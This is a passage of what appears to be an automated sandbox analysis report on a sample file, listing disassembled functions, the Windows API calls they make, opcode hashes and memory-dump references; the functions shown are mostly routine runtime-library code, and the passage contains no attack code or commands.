                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                                                                                              • String ID: .CHM$.HLP$.INI
                                                                                                                                              • API String ID: 2140653559-4017452060
                                                                                                                                              • Opcode ID: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                                              • Instruction ID: 3da9f7d339a1fb26a9a14cda2295bd93ec93db32f178aaf1e18dcb2e1e69cc93
                                                                                                                                              • Opcode Fuzzy Hash: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                                              • Instruction Fuzzy Hash: 6E415D719407089FEB70EFA9D884A9A77E8BF08705F10482FF585D7241EB789640CB29
                                                                                                                                              Function 0042B312 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044D0A0,00000118,004247AD,00000001,00000000,0044C958,00000008,0042CEFA,00000000,00000000,00000000), ref: 0042B393
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                                              • API String ID: 514040917-1673886896
                                                                                                                                              • Opcode ID: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                                              • Instruction ID: b314efe4c5fffc74cec8ecc2e7cadf2550e4b4112e7a556f74e2c9ec29160370
                                                                                                                                              • Opcode Fuzzy Hash: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                                              • Instruction Fuzzy Hash: 2A312331B012246BE701AB61AC82F9F37699F04718FA4406FF510A7293CB3C9A254B9D
                                                                                                                                              Function 00426C93 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                              • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$EnvironmentErrorLastVariable
                                                                                                                                              • String ID: :$=
                                                                                                                                              • API String ID: 373561786-2134709475
                                                                                                                                              • Opcode ID: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                                              • Instruction ID: 7366dd2e4e53350f74b67eef3e98498b2befc9c9fea16cefb053c97ee1566376
                                                                                                                                              • Opcode Fuzzy Hash: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                                              • Instruction Fuzzy Hash: C031DB71A042784BCB219F64AC456DEBBB4AF4A314F85019FE49492251CB385E91CF59
                                                                                                                                              Function 00430910 Relevance: 12.2, APIs: 8, Instructions: 196COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044D18C,00000001,00000000,00000000,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?,00000001,?), ref: 00430937
                                                                                                                                              • GetLastError.KERNEL32 ref: 00430949
                                                                                                                                              • LCMapStringW.KERNEL32(?,00000100,?,?,?,?,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?,00000001,?), ref: 0043099B
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0044EA38,00000024,00426AC8,?,00000100,00000100,00000001,?), ref: 004309F6
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00430A68
                                                                                                                                              • LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000), ref: 00430A84
                                                                                                                                              • LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000), ref: 00430AF0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: d41239965e63cfd970b332cf328efa988257490f0232b29b65bb4f0480a62afa
                                                                                                                                              • Instruction ID: c75369914bf4c3845868e9c525b061c252f4a32f5de875d7f1cb08cbfcae34e4
                                                                                                                                              • Opcode Fuzzy Hash: d41239965e63cfd970b332cf328efa988257490f0232b29b65bb4f0480a62afa
                                                                                                                                              • Instruction Fuzzy Hash: 42717CB180020AAFDF119FA1DC919AFBB75FF09358F14522AFA14A22A0C3398951DF59
                                                                                                                                              Function 0042D3D4 Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D3F0
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00425792), ref: 0042D404
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D426
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,75920A60,00000000,?,?,?,?,00425792), ref: 0042D45A
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425792), ref: 0042D47C
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425792), ref: 0042D495
                                                                                                                                              • GetEnvironmentStrings.KERNEL32(75920A60,00000000,?,?,?,?,00425792), ref: 0042D4AB
                                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042D4E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 883850110-0
                                                                                                                                              • Opcode ID: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                                              • Instruction ID: 472f25f2f3a0fa31c34653a7449e3421f98c337e42acfa1e6a6286993b93246e
                                                                                                                                              • Opcode Fuzzy Hash: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                                              • Instruction Fuzzy Hash: 7731F2B2F042746FD7207F75BC8493BB6ACEA463587A60A3FF545C3201D639AC41866E
                                                                                                                                              Function 00433F37 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___shr_12
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                                                              • API String ID: 2664560246-4131533671
                                                                                                                                              • Opcode ID: 8025318d78a5ff0f6e88d8d06ec2f51d5bfd69a907a0b40d4c703f9138ae3771
                                                                                                                                              • Instruction ID: 0f9e25a5ffa5b16699b39da3e8b3db3c94cd76f7283178b2ef22f30a253709ab
                                                                                                                                              • Opcode Fuzzy Hash: 8025318d78a5ff0f6e88d8d06ec2f51d5bfd69a907a0b40d4c703f9138ae3771
                                                                                                                                              • Instruction Fuzzy Hash: A7816B32D0429A8EDF11CF64C8847EF7BB4AF69314F04659BD850DB282D37CA645C7A9
                                                                                                                                              Function 004318D6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042AF1E: GetLastError.KERNEL32(?,00000000,00427906,004297FA,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD), ref: 0042AF20
                                                                                                                                                • Part of subcall function 0042AF1E: GetCurrentThreadId.KERNEL32 ref: 0042AF6D
                                                                                                                                                • Part of subcall function 0042AF1E: SetLastError.KERNEL32(00000000,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8,0000000C), ref: 0042AF84
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A45
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A9E
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ABB
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ADE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLast$CurrentThread
                                                                                                                                              • String ID: mE
                                                                                                                                              • API String ID: 1370660682-852767849
                                                                                                                                              • Opcode ID: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                                              • Instruction ID: c8d6d545ca8254b81aa9c793cbca4ed0fd90ebe6b659f5e3f0dc62acac4ae604
                                                                                                                                              • Opcode Fuzzy Hash: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                                              • Instruction Fuzzy Hash: 0B61C4B6B00315AFDB14AF99CC41BAEB2B6EF88314F64452FF50097291D7B99D008B58
                                                                                                                                              Function 00411D90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 00411E74
                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 00411EA7
                                                                                                                                              • MessageBoxA.USER32(00000000,?,00446A11,00000001), ref: 00411F83
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
